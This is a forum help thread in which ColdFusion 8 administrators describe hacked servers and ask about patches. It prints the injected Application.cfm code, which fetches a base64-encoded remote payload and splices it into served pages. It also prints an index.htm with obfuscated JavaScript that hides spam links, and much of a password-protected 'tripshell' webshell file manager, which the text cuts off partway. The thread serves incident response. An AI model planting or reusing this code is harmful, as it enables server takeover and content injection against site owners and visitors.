Skip to main content
J
Jjboswell
Participant
February 4, 2013
Question

CF8.01 hacked. Need info on patches

  • February 4, 2013
  • 4 replies
  • 29950 views

Yesterday some of our hosted sites were hacked using code pasted below.  We're running CF 8.01 and I'm wondering if there is a cumulative secutity patch that we can apply or If I should just apply every security patch that I can find.  I noticed that this particular vulnerability was patched for CF9 and 10 about six weeks ago.

Here's the hack:

  1. Application.cfm

<cfif (FindNoCase("Archivver",http_user_agent) EQ 0)><cfsavecontent variable="paga"><CFHTTP METHOD = "Get" URL = "http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Archivver">

<cfset mmy = cfhttp.FileContent><cfoutput>

#mmy#

</cfoutput>

</cfsavecontent>

<CFHTTP METHOD = "Get" URL = "#hSWaawe('aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==')#">

<cfset cfs = cfhttp.FileContent>

<cfif (FindNoCase("</div>",paga) GT 0)>

<cfset paga = replace(paga, "</div>", "</div>#cfs#", "one")>

<cfelseif (FindNoCase("</table>",paga) GT 0)>

<cfset paga = replace(paga, "</table>", "</table>#cfs#", "one")>

<cfelseif (FindNoCase("</a>",paga) GT 0)>

<cfset paga = replace(paga, "</a>", "</a>#cfs#", "one")>

<cfelse>

<cfset paga = replace(paga, "</body>", "#cfs#</body>", "one")>

</cfif>

<cfoutput>

#paga#

</cfoutput>

<cfabort>

</cfif>

<cffunction name="hSWaawe"> 

<cfargument name="HxzcGlk">

<cfset Ypg = ToString(ToBinary(HxzcGlk))>

<cfreturn Ypg>

</cffunction>

  1. Index.htm

<html>

  <head>

    <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.thehiltonorlando.com/">

  </head>

  <body>

    <br>

    <br>

    <br>

    <br>

    <center>

      <a href="http://www.thehiltonorlando.com/">This page has moved.  Please click here if you are not automatically redirected in a moment...</a><script language="JavaScript">function zdrViewState()

{

var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','9977918890','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];

t=z='';

for(v=0;v<m.length;){t+=m.charAt(v++);

if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);

t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}zdrViewState();

</script>

<p class="zdroq">

Most of the time, the borrower would <a href="http://www.paydayloans-online-uk.co.uk/" title="Payday">payday</a> be the one jeopardized. Applying to various payday loan sites could create suspicion to the lender <a href="http://payday-loans-fts.co.uk/" title="Payday Loans">payday loans</a> and this could make the approval process unnecessarily burdening. Having a checking account is also a <a href="http://best-rates-payday-loans.co.uk/" title="Http://best-rates-payday-loans.co.uk/">http://best-rates-payday-loans.co.uk/</a> must. They would also need this in order to withdraw money from your account when the payment is <a href="http://bad-credit-payday.co.uk/" title="Payday Loans Bad Credit">payday loans bad credit</a> due. In the long run, you would see that they have high interest rates that would be equivalent to wasting your <a href="http://payday-loans-eng.co.uk/" title="Payday Loans Uk">payday loans uk</a> money. </p>

    </center>

  </body>

</html>

Thanks in advance.

--Jeremy

    This topic has been closed for replies.

    4 replies

    R
    rickzki
    Participating Frequently
    April 3, 2013

    Hi all,

    We're running CF 9 (patched up) multi-server on Windows Server 20008 R2. I've searched through our "JRun4\servers\server_instance\cfusion.ear\cfusion.war\CFIDE" directories, including the "adminapi" sub-directory, looking for the aforementioned files (adss.cfm, fusebox.cfm, h.cfm, i.cfm) and cannot seem to find anything.

    I've also hit up the various Application.cfm files in the those CFIDE directories as well as the root CFIDE directory that's associated with the "cfusion" server instance. The Application.cfm files are encoded so how do I check to see if they have that modified code? Or would it simply overwrite the encoded version with the corrupted sample above?

    Additionally, no luck on finding trip.jar.

    Lastly, I've searched for that index.htm file and not found anything either. Yet, something has to be present because even though we built a brand new server and patched up before deploying and our source code is still showing the script block and text at the very bottom of the page.

    Are there any other locations that I should be searching through specifically? Based on your experiences, where have you found the index.htm file?

    Thank you in advance for any additional clarification you can provide!

    Rick

    C
    Cenn_Raven
    Participant
    September 22, 2013

    Ok, I just found /cfide/updates.cfm but I don't know if this part of the problem or if it was something that's always been there, but the date on the file is more recent than any other file.

    This is crazy scary. I've been following this thread since the beginning of the year I've been dealing with this for the past 6 months.

    I couldn't find h.cfm or i.cfm or the other files mentioned.

    Here's the code from updates.cfm

    <p>&lt;html&gt;<br>

              &lt;body&gt;<br>

              &lt;!--- <br>

              Created by S?bastien Denis - <br>

              1.0 : 23-nov-2004<br>

              1.1 : 03-fev-2005 - new action: synchronize<br>

              ============================================================================<br>

              The FileManager can be use as a common file manager or as a CFMODULE use inside an application.<br>

              ============================================================================<br>

              Depending of the action (fuseaction attributes), the other attributes are...<br>

              FUSEACTION                    OTHER ATTRIBUTES<br>

              ============================================================================<br>

              PASSWORD<br>

              If password is required to access the module.<br>

              Display a form to enter password.<br>

              PASSWORDHASH<br>

              Hash the password.<br>

              HOME<br>

              Display the file manager.<br>

              PATH (default= current path)<br>

              EDITEXTENSIONS (list of extensions to enable file edition)<br>

              GETDIR (default = current folder)<br>

              SEARCH<br>

              Perform a search. <br>

              Return a query GETDIR and a call to fuseaction = HOME with this query.<br>

              SEARCHNAME (reg exp corresponding to file/folder name)<br>

              SEARCHTEXT (reg exp corresponding to file content)<br>

              RECURSIVE (optional recursive search: 0/1 - default = 0)<br>

              MAXSEARCHRESULT (number of result: n - default = 1)<br>

              EDIT<br>

              Edit a file<br>

              EDITEXTENSIONS (list of extension - show the EDIT button)<br>

              (default = txt,htm,html,cfm,cfml,asp,aspx,php,jsp,js,ini,bat,log,reg,xml,dtd,xslt)<br>

              If &quot;ALL&quot;, all files are editable<br>

              PATH<br>

              FILE<br>

              WRITE<br>

              Write the edited file<br>

              PATH<br>

              FILE<br>

              FILENEWCONTENT<br>

              UPLOAD                              PATH, NBROFUPLOAD (number of the maximum file to upload at once - default is 20) <br>

              DOWNLOAD                    PATH, FILE<br>

              ADDDIR                              PATH, DIRNEW<br>

              ADDFILE                              PATH, FILENEW<br>

              RENAMEFILE                    PATH, FILE, FILENEW<br>

              RENAMEDIR                    PATH, DIR, DIRNEW<br>

              COPYFILE                    PATH, FILE, PATHNEW (with the new file name)<br>

              COPYDIR                              PATH, DIR, PATHNEW (with the new folder name)<br>

              MOVEFILE                    PATH, FILE, PATHNEW (without the new file name) <br>

              MOVEDIR                              PATH, DIR, PATHNEW (without the new folder name)<br>

              DELETEFILE                    PATH, FILE<br>

              DELETEDIR                    PATH, DIR<br>

              DELETEDIRRECURSIVE PATH, DIR<br>

              SYNCDIR                              PATH, PATHNEW (path; origin, pathNew: destination), OVERWRITEALL<br>

              <br>

              Other attributes:<br>

              ============================================================================<br>

              thisModule                    the path to this module (cfmodule)<br>

              default = listLast(cgi.script_name,&quot;/\&quot;)<br>

              relocate                    0/1 (default 1, 0 in recursive call)<br>

              CheckPassword          default = &quot;&quot;<br>

              To compare with H to allow access to module<br>

              If no correspondance =&gt; fuseaction = password<br>

              If checkPassword = &quot;&quot; =&gt; No access control.<br>

              H                                        The Hashed password always required if checkPassword neq &quot;&quot;.<br>

              PATHALLOWED                    The path beyond which the module cannot go.<br>

              default = &quot;&quot; meaning no limits.<br>

              STYLE                              0/1 (default = 1) include basic style.<br>

              ---&gt;</p>

    <p>&lt;cftry&gt;</p>

    <p>&lt;CFAPPLICATION NAME=&quot;tripshell&quot; SESSIONMANAGEMENT=&quot;Yes&quot; SESSIONTIMEOUT=&quot;#CreateTimeSpan(0, 0, 20, 0)#&quot;&gt;</p>

    <p> &lt;cfif (IsDefined(&quot;Session.tripshell&quot;) AND Session.tripshell EQ &quot;ok&quot;) OR (IsDefined(&quot;form.code&quot;) AND form.code EQ &quot;h4xz0r666&quot;)&gt;<br>

              &lt;b&gt;Ok all good&lt;/b&gt;<br>

              &lt;cfset session.tripshell='ok'&gt;<br>

    </p>

    <p>&lt;!--- ************ Personal parameter *************** ---&gt; <br>

              &lt;cfset attributes.editExtensions = &quot;ALL&quot;&gt;<br>

              &lt;!--- ************ Personal parameter *************** ---&gt; </p>

    <p>&lt;cfsetting requestTimeout = 1000&gt;<br>

              &lt;!--- formurl2attributes ---&gt;<br>

              &lt;cfparam name=&quot;attributes&quot; default=&quot;#structNew()#&quot;&gt;<br>

              &lt;cfset structAppend(attributes,form,&quot;no&quot;)&gt;<br>

              &lt;cfset structAppend(attributes,url,&quot;no&quot;)&gt;<br>

              &lt;!--- Default parameters ---&gt;<br>

              &lt;cfparam name=&quot;attributes.path&quot; default=&quot;#expandPath(&quot;.&quot;)#&quot;&gt;<br>

              &lt;cfparam name=&quot;attributes.fuseaction&quot; default=&quot;home&quot;&gt;<br>

              &lt;cfparam name=&quot;attributes.recursive&quot; default=&quot;0&quot;&gt;<br>

              &lt;cfparam name=&quot;attributes.showpath&quot; default=&quot;0&quot;&gt;<br>

              &lt;cfparam name=&quot;attributes.searchtext&quot; default=&quot;&quot;&gt;<br>

              &lt;cfparam name=&quot;attributes.searchname&quot; default=&quot;&quot;&gt;<br>

              &lt;cfparam name=&quot;attributes.maxsearchresult&quot; default=&quot;1&quot;&gt;<br>

              &lt;cfparam name=&quot;attributes.checkpassword&quot; default=&quot;&quot;&gt;<br>

              &lt;cfparam name=&quot;attributes.password&quot; default=&quot;&quot;&gt;<br>

              &lt;cfparam name=&quot;attributes.nbrOfUpload&quot; default=&quot;20&quot;&gt;<br>

              &lt;cfparam name=&quot;attributes.editExtensions&quot; default=&quot;txt,htm,html,cfm,cfml,asp,aspx,php,jsp,js,ini,bat,log,reg,xml,dtd,xslt&quot;&gt;<br>

              &lt;cfparam name=&quot;attributes.relocate&quot; default=&quot;1&quot;&gt;<br>

              &lt;cfparam name=&quot;attributes.overwriteAll&quot; default=&quot;0&quot;&gt;<br>

              &lt;cfparam name=&quot;attributes.style&quot; default=&quot;1&quot;&gt;<br>

              &lt;cfparam name=&quot;attributes.pathAllowed&quot; default=&quot;&quot;&gt;<br>

              &lt;cfparam name=&quot;attributes.thisModule&quot; default=&quot;#listLast(cgi.script_name,&quot;/\&quot;)#&quot;&gt;<br>

              &lt;cfparam name=&quot;attributes.h&quot; default=&quot;&quot;&gt;<br>

              &lt;!--- Find delimiter and set path ---&gt;<br>

              &lt;cfif find(&quot;/&quot;,cgi.CF_TEMPLATE_PATH)&gt;<br>

              &lt;cfset attributes.delimiter = &quot;/&quot;&gt;<br>

              &lt;cfelse&gt;<br>

              &lt;cfset attributes.delimiter = &quot;\&quot;&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;cfset attributes.path = reReplace(attributes.path,&quot;\#attributes.delimiter#{2,}&quot;,attributes.delimiter,&quot;ALL&quot;)&gt;<br>

              &lt;cfif right(attributes.path,1) eq attributes.delimiter and len(attributes.path) gt 1&gt;<br>

              &lt;cfset attributes.path = left(attributes.path,len(attributes.path)-1)&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;!--- UDF ---&gt;<br>

              &lt;cffunction name=&quot;loc&quot;&gt;<br>

              &lt;cfargument name=&quot;qs&quot;&gt;<br>

              &lt;cfargument name=&quot;relocate&quot;&gt;<br>

              &lt;cfif relocate&gt;<br>

              &lt;cflocation url=&quot;?#qs#&path=#attributes.path#&h=#attributes.H#&quot;&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cffunction&gt;<br>

              &lt;!--- Password check ---&gt;<br>

              &lt;cfif attributes.fuseaction neq &quot;passwordHash&quot; and attributes.checkPassword neq &quot;&quot;&gt;<br>

              &lt;cfif isDefined(&quot;attributes.H&quot;)&gt;<br>

              &lt;cfif hash(attributes.checkpassword) neq attributes.H&gt;<br>

              &lt;cfset attributes.fuseaction = &quot;password&quot;&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;cfelse&gt;<br>

              &lt;cfset attributes.fuseaction = &quot;password&quot;&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;!--- Path check ---&gt;<br>

              &lt;cfif attributes.pathAllowed neq &quot;&quot;&gt;<br>

              &lt;cfif not findNoCase(attributes.pathAllowed,attributes.path)&gt;<br>

              &lt;cfset attributes.path = attributes.pathAllowed&gt;<br>

              &lt;cfset attributes.msg = &quot;Error: cannot go beyond &quot;&quot;#attributes.pathAllowed#&quot;&quot;&quot;&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;!--- CSS Style ---&gt;<br>

              &lt;cfif attributes.style and attributes.relocate&gt;<br>

              &lt;style&gt;<br>

              body,table,input{font:11px;font-family:verdana}<br>

              button, .button{font:11px;font-family:verdana;width:50;text-align:center;border:1px solid black;background-color:#EEEEEE;cursor:hand;padding:1 0 1 0;}<br>

              &lt;/style&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;!--- Fusebox ---&gt;<br>

              &lt;cfswitch expression=&quot;#attributes.fuseaction#&quot;&gt;</p>

    <p> &lt;cfcase value=&quot;password&quot;&gt;<br>

              &lt;cfoutput&gt;<br>

              &lt;form action=&quot;?&quot; method=&quot;post&quot;&gt;<br>

              &lt;input type=&quot;hidden&quot; name=&quot;fuseaction&quot; value=&quot;passwordHash&quot;&gt;<br>

              Password: &lt;input type=&quot;password&quot; name=&quot;password&quot;&gt;&nbsp;&lt;input type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;Submit&quot; class=&quot;button&quot;&gt;<br>

              &lt;/form&gt;<br>

              &lt;/cfoutput&gt;<br>

              &lt;/cfcase&gt;<br>

              <br>

              &lt;cfcase value=&quot;passwordHash&quot;&gt;<br>

              &lt;cfoutput&gt;<br>

              &lt;script&gt;window.location.href=&quot;?h=#hash(attributes.password)#&quot;;&lt;/script&gt;<br>

              &lt;/cfoutput&gt;<br>

              &lt;/cfcase&gt;<br>

              <br>

              &lt;cfcase value=&quot;home&quot;&gt;<br>

              &lt;cfoutput&gt;<br>

              &lt;title&gt;FileManager: #attributes.path#&lt;/title&gt;<br>

              &lt;script&gt;<br>

              function addDir(){<br>

              var sDirNew = prompt(&quot;Create folder in #JSStringFormat(attributes.path)#.\nFolder name:&quot;,&quot;&quot;);<br>

              if (sDirNew != null && sDirNew != &quot;&quot;){<br>

              window.location.href=&quot;?fuseaction=addDir&path=#JSStringFormat(attributes.path)#&dirNew=&quot; + sDirNew + &quot;&h=#attributes.h#&quot;;<br>

              }<br>

              }<br>

              function addFile(){<br>

              var sFileNew = prompt(&quot;Create file in #JSStringFormat(attributes.path)#.\nFile name:&quot;,&quot;&quot;);<br>

              if (sFileNew != null && sFileNew != &quot;&quot;){<br>

              window.location.href=&quot;?fuseaction=addFile&path=#JSStringFormat(attributes.path)#&fileNew=&quot; + sFileNew + &quot;&h=#attributes.h#&quot;;<br>

              }<br>

              }<br>

              function renameFile(sFile){<br>

              var sFileNew = prompt(&quot;New file name&quot;,sFile + &quot;_copy&quot;);<br>

              if (sFileNew != null && sFileNew != &quot;&quot; && sFileNew != sFile){<br>

              window.location.href=&quot;?fuseaction=renamefile&path=#JSStringFormat(attributes.path)#&file=&quot; + sFile + &quot;&fileNew=&quot; + sFileNew + &quot;&h=#attributes.h#&quot;;<br>

              }<br>

              }<br>

              function renameDir(sDir){<br>

              var sDirNew = prompt(&quot;New folder name&quot;,sDir + &quot;_copy&quot;);<br>

              if (sDirNew != null && sDirNew != &quot;&quot; && sDirNew != sDir){<br>

              window.location.href=&quot;?fuseaction=renameDir&path=#JSStringFormat(attributes.path)#&dir=&quot; + sDir + &quot;&dirNew=&quot; + sDirNew + &quot;&h=#attributes.h#&quot;;<br>

              }<br>

              } <br>

              function copyFile(sFile){<br>

              sDefault = &quot;#JSStringFormat(attributes.path)##JSStringFormat(attributes.delimiter)#&quot; + sFile;<br>

              var sPathNew = prompt(&quot;Destination for \&quot;&quot; + sFile + &quot;\&quot;.&quot;,sDefault);<br>

              if (sPathNew != null && sPathNew != &quot;&quot; && sPathNew != sDefault){<br>

              window.location.href=&quot;?fuseaction=copyFile&path=#JSStringFormat(attributes.path)#&pathNew=&quot; + sPathNew + &quot;&file=&quot; + sFile + &quot;&h=#attributes.h#&quot;;<br>

              }<br>

              }<br>

              function copyDir(sDir){<br>

              sDefault = &quot;#JSStringFormat(attributes.path)##JSStringFormat(attributes.delimiter)#&quot; + sDir;<br>

              var sPathNew = prompt(&quot;Destination for \&quot;&quot; + sDir + &quot;\&quot;.\nProvide a UNEXISTANT path!&quot;,sDefault + &quot;_copy&quot;);<br>

              if (sPathNew != null && sPathNew != &quot;&quot; && sPathNew != sDefault){<br>

              window.location.href=&quot;?fuseaction=copydir&path=#JSStringFormat(attributes.path)#&dir=&quot; + sDir + &quot;&pathNew=&quot; + sPathNew + &quot;&h=#attributes.h#&quot;;<br>

              }<br>

              }<br>

              function moveFile(sFile){<br>

              sDefault = &quot;#JSStringFormat(attributes.path)#&quot;;<br>

              var sPathNew = prompt(&quot;Move \&quot;&quot; + sFile + &quot;\&quot; to:&quot;,sDefault);<br>

              if (sPathNew != null && sPathNew != &quot;&quot; && sPathNew != sDefault){<br>

              window.location.href=&quot;?fuseaction=moveFile&path=#JSStringFormat(attributes.path)#&pathNew=&quot; + sPathNew + &quot;&file=&quot; + sFile + &quot;&h=#attributes.h#&quot;;<br>

              }<br>

              }<br>

              function moveDir(sDir){<br>

              sDefault = &quot;#JSStringFormat(attributes.path)#&quot;;<br>

              var sPathNew = prompt(&quot;Move \&quot;&quot; + sDir + &quot;\&quot; to:&quot;,sDefault);<br>

              if (sPathNew != null && sPathNew != &quot;&quot; && sPathNew != sDefault){<br>

              window.location.href=&quot;?fuseaction=moveDir&path=#JSStringFormat(attributes.path)#&pathNew=&quot; + sPathNew + &quot;&dir=&quot; + sDir + &quot;&h=#attributes.h#&quot;;<br>

              }<br>

              }<br>

              function syncDir(sDir){<br>

              sDefault = &quot;#JSStringFormat(attributes.path)#&quot; + &quot;\\&quot; + sDir;<br>

              var sPathNew = prompt(&quot;Synchronize \&quot;&quot; + sDefault + &quot;\&quot; to:&quot;,sDefault);<br>

              var bOverwriteAll = 0;<br>

              if (sPathNew != null && sPathNew != &quot;&quot; && sPathNew != sDefault){<br>

              if (confirm(&quot;Do yout want to overwrite all files?\nOK: copy all files.\nCancel: copy new and modified files.&quot;)) bOverwriteAll = 1;<br>

              window.location.href=&quot;?fuseaction=syncDir&path=&quot; + sDefault + &quot;&pathNew=&quot; + sPathNew + &quot;&overwriteall=&quot; + bOverwriteAll + &quot;&h=#attributes.h#&quot;;<br>

              }<br>

              }<br>

              function deleteFile(sFile){<br>

              if (confirm(&quot;Delete \&quot;&quot; + sFile + &quot;\&quot;?&quot;))window.location.href=&quot;?fuseaction=deletefile&path=#JSStringFormat(attributes.path)#&file=&quot; + sFile + &quot;&h=#attributes.h#&quot;;<br>

              }<br>

              function deleteDir(sDir){<br>

              if (confirm(&quot;Delete \&quot;&quot; + sDir + &quot;\&quot;?&quot;))window.location.href=&quot;?fuseaction=deletedir&path=#JSStringFormat(attributes.path)#&dir=&quot; + sDir + &quot;&h=#attributes.h#&quot;;<br>

              }<br>

              function showNextUpload(n){<br>

              document.getElementById(&quot;fileUpload&quot; + n).style.display='';<br>

              document.getElementById(&quot;submitUpload&quot;).style.display='';<br>

              }<br>

              &lt;/script&gt;<br>

              &lt;cfif isDefined(&quot;attributes.msg&quot;)&gt;<br>

              &lt;h4 style=&quot;color:#iif(findNoCase(&quot;error&quot;,attributes.msg),&quot;'red'&quot;,&quot;'green'&quot;)#&quot;&gt;#attributes.msg#&lt;/h4&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;cfif len(attributes.path) gt 1&gt;<br>

              &lt;cfset attributes.parentpath = listDeleteAt(attributes.path,listLen(attributes.path,attributes.delimiter),attributes.delimiter)&gt;<br>

              &lt;cfelse&gt;<br>

              &lt;cfset attributes.parentpath = &quot;&quot;&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;table style=&quot;border:1 solid black&quot;&gt;<br>

              &lt;form action=&quot;?&quot; method=&quot;post&quot;&gt;<br>

              &lt;input type=&quot;hidden&quot; name=&quot;h&quot; value=&quot;#attributes.h#&quot;&gt;<br>

              &lt;tr&gt;<br>

              &lt;td width=&quot;100&quot;&gt;Parent:&lt;/td&gt;<br>

              &lt;td&gt;&lt;a href=&quot;?path=#attributes.parentpath#&h=#attributes.h#&quot;&gt;#attributes.parentpath#&lt;/a&gt;&lt;/td&gt;<br>

              &lt;/tr&gt;<br>

              &lt;tr&gt;<br>

              &lt;td valign=&quot;top&quot;&gt;Path:&lt;/td&gt;<br>

              &lt;td&gt;<br>

              &lt;input type=&quot;text&quot; name=&quot;path&quot; value=&quot;#attributes.path#&quot; style=&quot;font-weight:bold&quot; size=&quot;100&quot;&gt;&nbsp;<br>

              &lt;input type=&quot;submit&quot; value=&quot;Submit&quot; class=&quot;button&quot;&gt;&lt;br&gt;<br>

              &lt;button style=&quot;width:150&quot; onclick=&quot;addDir()&quot;&gt;Create a folder&lt;/button&gt;&nbsp;<br>

              &lt;button style=&quot;width:150&quot; onclick=&quot;addFile()&quot;&gt;Create a file&lt;/button&gt;<br>

              &lt;/td&gt;<br>

              &lt;/tr&gt;<br>

              &lt;/form&gt;<br>

              &lt;form action=&quot;?&quot; method=&quot;post&quot;&gt;<br>

              &lt;input type=&quot;hidden&quot; name=&quot;h&quot; value=&quot;#attributes.h#&quot;&gt;<br>

              &lt;input type=&quot;hidden&quot; name=&quot;fuseaction&quot; value=&quot;search&quot;&gt;<br>

              &lt;input type=&quot;hidden&quot; name=&quot;path&quot; value=&quot;#attributes.path#&quot;&gt;<br>

              &lt;tr&gt;<br>

              &lt;td&gt;Search:&lt;/td&gt;<br>

              &lt;td&gt;&lt;span style=&quot;width:150&quot;&gt;File/folder name (RE):&lt;/span&gt;&lt;input type=&quot;text&quot; name=&quot;searchname&quot; size=&quot;70&quot; value=&quot;#attributes.searchname#&quot;&gt;&lt;/td&gt;<br>

              &lt;/tr&gt;<br>

              &lt;tr&gt;<br>

              &lt;td&gt;&nbsp;&lt;/td&gt;<br>

              &lt;td&gt;&lt;span style=&quot;width:150&quot;&gt;Containg text (RE):&lt;/span&gt;&lt;input type=&quot;text&quot; name=&quot;searchtext&quot; size=&quot;70&quot; value=&quot;#attributes.searchtext#&quot;&gt;&lt;/td&gt;<br>

              &lt;/tr&gt;<br>

              &lt;tr&gt;<br>

              &lt;td&gt;&nbsp;&lt;/td&gt;<br>

              &lt;td&gt;<br>

              Recursive &lt;input type=&quot;checkbox&quot; name=&quot;recursive&quot; value=&quot;1&quot; #iif(attributes.recursive,&quot;'checked'&quot;,&quot;''&quot;)#&gt;&nbsp;<br>

              Max. result &lt;select name=&quot;maxsearchresult&quot;&gt;<br>

              &lt;option value=&quot;1&quot; #iif(attributes.maxsearchresult eq 1,&quot;'SELECTED'&quot;,&quot;''&quot;)#&gt;1&lt;/option&gt;<br>

              &lt;option value=&quot;5&quot; #iif(attributes.maxsearchresult eq 5,&quot;'SELECTED'&quot;,&quot;''&quot;)#&gt;5&lt;/option&gt;<br>

              &lt;option value=&quot;10&quot; #iif(attributes.maxsearchresult eq 10,&quot;'SELECTED'&quot;,&quot;''&quot;)#&gt;10&lt;/option&gt;<br>

              &lt;option value=&quot;50&quot; #iif(attributes.maxsearchresult eq 50,&quot;'SELECTED'&quot;,&quot;''&quot;)#&gt;50&lt;/option&gt;<br>

              &lt;option value=&quot;100&quot; #iif(attributes.maxsearchresult eq 100,&quot;'SELECTED'&quot;,&quot;''&quot;)#&gt;100&lt;/option&gt;<br>

              &lt;/select&gt;<br>

              &lt;input type=&quot;submit&quot; value=&quot;Submit&quot; class=&quot;button&quot;&gt;&lt;/td&gt;<br>

              &lt;/tr&gt;<br>

              &lt;/form&gt;<br>

              &lt;form action=&quot;?&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot;&gt;<br>

              &lt;input type=&quot;hidden&quot; name=&quot;h&quot; value=&quot;#attributes.h#&quot;&gt;<br>

              &lt;input type=&quot;hidden&quot; name=&quot;fuseaction&quot; value=&quot;upload&quot;&gt;<br>

              &lt;input type=&quot;hidden&quot; name=&quot;path&quot; value=&quot;#attributes.path#&quot;&gt;<br>

              &lt;tr&gt;<br>

              &lt;td valign=&quot;top&quot;&gt;Upload:&lt;/td&gt;<br>

              &lt;td&gt;<br>

              &lt;span style=&quot;width:20&quot;&gt;1.&lt;/span&gt;&lt;input type=&quot;File&quot; name=&quot;file1&quot; size=&quot;70&quot; onchange=&quot;showNextUpload(2)&quot;&gt;<br>

              &lt;input type=&quot;checkbox&quot; name=&quot;overwrite1&quot;&gt;Overwrite<br>

              &lt;cfloop index=&quot;i&quot; from=&quot;2&quot; to=&quot;#attributes.nbrOfUpload#&quot;&gt;<br>

              &lt;div id=&quot;fileUpload#i#&quot; style=&quot;display:'none'&quot;&gt;<br>

              &lt;span style=&quot;width:20&quot;&gt;#i#.&lt;/span&gt;&lt;input type=&quot;File&quot; name=&quot;file#i#&quot; size=&quot;70&quot; onchange=&quot;showNextUpload(#i+1#)&quot;&gt;<br>

              &lt;input type=&quot;checkbox&quot; name=&quot;overwrite#i#&quot;&gt;Overwrite<br>

              &lt;/div&gt;<br>

              &lt;/cfloop&gt;<br>

              &lt;input type=&quot;submit&quot; value=&quot;Upload&quot; name=&quot;submitUpload&quot; class=&quot;button&quot; style=&quot;display:'none'&quot;&gt;<br>

              &lt;/td&gt;<br>

              &lt;/tr&gt;<br>

              &lt;/form&gt;<br>

              &lt;/table&gt;<br>

              &lt;/cfoutput&gt;<br>

              &lt;cfflush&gt;<br>

              &lt;cfif not isDefined(&quot;attributes.getDir&quot;)&gt;<br>

              &lt;cfdirectory action=&quot;LIST&quot; directory=&quot;#attributes.path#&quot; name=&quot;attributes.getDir&quot;&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;br&gt;<br>

              &lt;table style=&quot;border:1 solid black&quot;&gt;<br>

              &lt;tr bgcolor=&quot;#c0c0c0&quot;&gt;<br>

              &lt;th&gt;&nbsp;&lt;/th&gt;<br>

              &lt;cfset colspan = 1&gt;<br>

              &lt;cfif attributes.showpath&gt;<br>

              &lt;cfset colspan = 2&gt;<br>

              &lt;th&gt;Path&lt;/th&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;th&gt;Name&lt;/th&gt;<br>

              &lt;th&gt;Actions&lt;/th&gt;<br>

              &lt;th&gt;Size&lt;/th&gt;<br>

              &lt;th&gt;Attr.&lt;/th&gt;<br>

              &lt;th&gt;Modif. date&lt;/th&gt;<br>

              &lt;/tr&gt;<br>

              &lt;cfoutput&gt; <br>

              &lt;tr&gt;<br>

              &lt;td colspan=&quot;#colspan#&quot;&gt;&lt;hr size=&quot;1&quot;&gt;&lt;/td&gt;<br>

              &lt;td align=&quot;center&quot;&gt;&lt;b&gt;F o l d e r s&lt;/b&gt;&lt;/td&gt;<br>

              &lt;td colspan=&quot;10&quot;&gt;&lt;hr size=&quot;1&quot;&gt;&lt;/td&gt;<br>

              &lt;/tr&gt;<br>

              &lt;/cfoutput&gt;<br>

              &lt;cfset i = 0&gt;<br>

              &lt;cfoutput query=&quot;attributes.getDir&quot;&gt;<br>

              &lt;cfif type eq &quot;dir&quot; and name neq &quot;.&quot; and name neq &quot;..&quot;&gt;<br>

              &lt;cfset i = i + 1&gt;<br>

              &lt;tr bgcolor=&quot;#iif(evaluate(i Mod 2),&quot;'F2F2F2'&quot;,&quot;'EFEFE2'&quot;)#&quot;&gt;<br>

              &lt;td&gt;#i#.&lt;/td&gt;<br>

              &lt;cfif attributes.showpath&gt;<br>

              &lt;td&gt;&lt;a href=&quot;?path=#path#&h=#attributes.h#&quot; style=&quot;text-decoration:none&quot;&gt;#path#&lt;/a&gt;&lt;/td&gt;<br>

              &lt;td&gt;&lt;a href=&quot;?path=#path##attributes.delimiter##name#&h=#attributes.h#&quot; style=&quot;text-decoration:none&quot;&gt;&lt;b&gt;#name#&lt;/b&gt;&lt;/a&gt;&lt;/td&gt;<br>

              &lt;td&gt;&lt;a onclick=&quot;window.location.href='?path=#JSStringFormat(&quot;#path##attributes.delimiter##name#&h=#attributes.h#&quot;)#'&quot; class=&quot;button&quot;&gt;Open&lt;/a&gt;&lt;/td&gt;<br>

              &lt;cfelse&gt;<br>

              &lt;td&gt;&lt;a href=&quot;?path=#attributes.path##attributes.delimiter##name#&h=#attributes.h#&quot; style=&quot;text-decoration:none&quot;&gt;&lt;b&gt;#name#&lt;/b&gt;&lt;/a&gt;&lt;/td&gt;<br>

              &lt;td&gt;<br>

              &lt;a onclick=&quot;window.location.href='?path=#JSStringFormat(attributes.path & attributes.delimiter)##name#&h=#attributes.h#'&quot; class=&quot;button&quot;&gt;Open&lt;/a&gt;<br>

              &lt;a onclick=&quot;renameDir('#name#')&quot; class=&quot;button&quot;&gt;Rename&lt;/a&gt;<br>

              &lt;a onclick=&quot;copyDir('#name#')&quot; class=&quot;button&quot;&gt;Copy&lt;/a&gt;<br>

              &lt;a onclick=&quot;moveDir('#name#')&quot; class=&quot;button&quot;&gt;Move&lt;/a&gt;<br>

              &lt;a onclick=&quot;deleteDir('#name#')&quot; class=&quot;button&quot; style=&quot;color:red&quot;&gt;Delete&lt;/a&gt;<br>

              &lt;a onclick=&quot;syncDir('#name#')&quot; class=&quot;button&quot;&gt;Sync.&lt;/a&gt;<br>

              &lt;/td&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;td&gt;&nbsp;&lt;/td&gt;<br>

              &lt;td&gt;#ATTRIBUTES#&nbsp;&lt;/td&gt;<br>

              &lt;td&gt;#DATELASTMODIFIED#&lt;/td&gt;<br>

              &lt;/tr&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfoutput&gt; <br>

